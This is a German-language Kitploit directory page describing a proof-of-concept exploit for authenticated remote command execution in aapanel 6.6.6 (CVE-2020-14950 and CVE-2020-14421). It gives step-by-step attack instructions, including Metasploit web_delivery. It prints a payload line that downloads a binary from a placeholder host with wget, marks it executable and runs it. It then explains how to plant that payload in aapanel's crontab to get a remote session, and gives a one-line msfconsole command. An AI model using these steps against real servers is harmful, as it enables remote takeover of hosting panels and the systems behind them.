Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
aapanel — aapanel 6.6.6 - (Authenticated) Remote Code Execution | Kitploit
Tools/GitHubGitHub/jenaye/aapanel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - (Authenticated) Remote Code Execution

Repository anzeigen
27vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Beschreibung : ermöglicht es remote authentifizierten Benutzern, über das Einstellungsmenü des Sotfware Store beliebige Befehle auszuführen.
  • Betroffene Version : Alle <= 6.6.6

Informationen

Um diesen PoC zu erstellen, habe ich die Software lediglich mit docker-compose installiert.

  • Schwachstellentyp : Remote-Befehlsausführung (RCE authentifiziert)

POC

Gehen Sie zum Software Store, klicken Sie auf eine beliebige Zeile im Einstellungsfeld, fangen Sie die Anfrage ab, wenn Sie auf "start/stop/restart" klicken, und ändern/bearbeiten Sie die Anfrage, um auszuführen, was Sie möchten. Hier ist ein Beispiel mit curl :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Beschreibung : Ermöglicht einem Angreifer, beliebige Befehle remote auszuführen.
  • Betroffene Version : Alle <= 6.6.6

Informationen

Um diesen PoC zu erstellen, habe ich frisches Ubuntu 20.04 installiert, dann wget + sudo installiert und dieses Skript ausgeführt: wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

  • Schwachstellentyp : Remote-Befehlsausführung (RCE authentifiziert)

POC

Richten Sie zunächst die web_delivery-Optionen ein; dies erstellt einen Payload und einen Listener.

web_delivery

Führen Sie es nun aus.

run

Dies erzeugt den folgenden Payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Dann fügen Sie es wie folgt in den script content des Crontab-Menüs in aapanel ein.

cron

Führen Sie nun einfach Ihren Crontab aus und warten Sie auf Ihre Session.

command

Schneller Exploit

Führen Sie einfach msfconsole -r aapanel.rc aus, fügen Sie den Payload in den script content-Bereich ein und genießen Sie Ihre Session.

Tool herunterladen